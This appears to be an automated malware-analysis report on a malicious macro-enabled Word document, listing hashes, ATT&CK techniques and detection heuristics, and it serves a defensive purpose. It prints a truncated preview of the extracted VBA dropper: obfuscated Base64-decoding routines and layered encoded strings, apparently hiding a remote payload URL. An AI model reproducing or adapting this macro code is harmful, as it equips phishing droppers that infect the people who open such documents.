Office (OOXML) malware analysis — malicious · 83e674ae06b546ae

MALICIOUS

Office (OOXML)

50.1 KB Created: 2018-08-11 23:59:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2018-08-14

MD5: 6ed4af5483f51e4361f1d923607a10b8 SHA-1: d9d196f1e70691a86bac521175a3327dfb1cf63e SHA-256: 83e674ae06b546aebf09b1b936a044ecfe591aadc77a8c3e3e68c7e618dc130e

202 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1129 Execution through API

The file is an OOXML document containing VBA macros, specifically triggering AutoOpen and Workbook_Open events. It also uses CreateObject, indicating an attempt to execute code. The document body explicitly prompts the user to enable macros to view content, a common lure. While the VBA script is truncated, its presence and the heuristics strongly suggest it's designed to download and execute a second-stage payload.

Heuristics 7

VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	4818 bytes
SHA-256: `6171d0da2ca87b8a2248e0922aa201261a8088a0a630160d722f5e361b26ae4b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private InitDone As Boolean Private Map1(0 To 63) As Byte Private Map2(0 To 127) As Byte Public Function PPTTransformto(ByVal s As String) As Byte() If Not InitDone Then Init Dim IBuf() As Byte: IBuf = PPTMathV(s) Dim ILen As Long: ILen = UBound(IBuf) + 1 If ILen Mod 4 <> 0 Then Err.Raise vbObjectError, , "Length of Base64 encoded input string is not a multiple of 4." Do While ILen > 0 If IBuf(ILen - 1) <> Asc("=") Then Exit Do ILen = ILen - 1 Loop Dim OLen As Long: OLen = (ILen * 3) \ 4 Dim Out() As Byte ReDim Out(0 To OLen - 1) As Byte Dim ip As Long Dim op As Long Do While ip < ILen Dim i0 As Byte: i0 = IBuf(ip): ip = ip + 1 Dim i1 As Byte: i1 = IBuf(ip): ip = ip + 1 Dim i2 As Byte: If ip < ILen Then i2 = IBuf(ip): ip = ip + 1 Else i2 = Asc("A") Dim i3 As Byte: If ip < ILen Then i3 = IBuf(ip): ip = ip + 1 Else i3 = Asc("A") If i0 > 127 Or i1 > 127 Or i2 > 127 Or i3 > 127 Then _ Err.Raise vbObjectError, , "Illegal character in Base64 encoded data." Dim b0 As Byte: b0 = Map2(i0) Dim b1 As Byte: b1 = Map2(i1) Dim b2 As Byte: b2 = Map2(i2) Dim b3 As Byte: b3 = Map2(i3) If b0 > 63 Or b1 > 63 Or b2 > 63 Or b3 > 63 Then _ Err.Raise vbObjectError, , "Illegal character in Base64 encoded data." Dim o0 As Byte: o0 = (b0 * 4) Or (b1 \ &H10) Dim o1 As Byte: o1 = ((b1 And &HF) * &H10) Or (b2 \ 4) Dim o2 As Byte: o2 = ((b2 And 3) * &H40) Or b3 Out(op) = o0: op = op + 1 If op < OLen Then Out(op) = o1: op = op + 1 If op < OLen Then Out(op) = o2: op = op + 1 Loop PPTTransformto = Out End Function Private Function PPTMathV(ByVal s As String) As Byte() Dim b1() As Byte: b1 = s Dim l As Long: l = (UBound(b1) + 1) \ 2 If l = 0 Then PPTMathV = b1: Exit Function Dim b2() As Byte ReDim b2(0 To l - 1) As Byte Dim p As Long For p = 0 To l - 1 Dim c As Long: c = b1(2 * p) + 256 * CLng(b1(2 * p + 1)) If c >= 256 Then c = Asc("?") b2(p) = c Next PPTMathV = b2 End Function Private Function ConvertPPT(b() As Byte) As String Dim l As Long: l = UBound(b) - LBound(b) + 1 Dim b2() As Byte ReDim b2(0 To (2 * l) - 1) As Byte Dim p0 As Long: p0 = LBound(b) Dim p As Long For p = 0 To l - 1: b2(2 * p) = b(p0 + p): Next Dim s As String: s = b2 ConvertPPT = s End Function Private Sub Init() Dim c As Integer, i As Integer ' set Map1 i = 0 For c = Asc("A") To Asc("Z"): Map1(i) = c: i = i + 1: Next For c = Asc("a") To Asc("z"): Map1(i) = c: i = i + 1: Next For c = Asc("0") To Asc("9"): Map1(i) = c: i = i + 1: Next Map1(i) = Asc("+"): i = i + 1 Map1(i) = Asc("/"): i = i + 1 ' set Map2 For i = 0 To 127: Map2(i) = 255: Next For i = 0 To 63: Map2(Map1(i)) = i: Next InitDone = True End Sub Public Function IgInteractiveppt(ByVal s As String) As String If s = "" Then IgInteractiveppt = "": Exit Function IgInteractiveppt = ConvertPPT(PPTTransformto(s)) End Function Sub OpenGLDrawn() WorkFlowV = IgInteractiveppt("YUhSMGNITTZMeTkwY25WbVpteGxNVEF3TG1aeUwzUmxjM1F1Y0hCMA==") WorkFlowV = IgInteractiveppt(WorkFlowV) Renderingtop = IgInteractiveppt("Vm14U1MwNUhTWGhXV0d4VVlUSm9WVmxyWkRSVk1WcHhWRzA1VldKSVFrcFphazVyVlVaV1ZVMUVhejA9") Renderingtop = IgInteractiveppt(Renderingtop) Renderingtop = IgInteractiveppt(Renderingtop) Renderingtop = IgInteractiveppt(Renderingtop) Renderingtop = IgInteractiveppt(Renderingtop) Renderingtop = IgInteractiveppt(Renderingtop) PPT_Locate = IgInteractiveppt("Y ... (truncated)
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	37888 bytes
SHA-256: `6228318f3db71e2a340ce1ed88a10e02fec8792b4b088d5ff9c6795d4603e67c`

Open this report in the interactive analyzer, or submit your own file for analysis.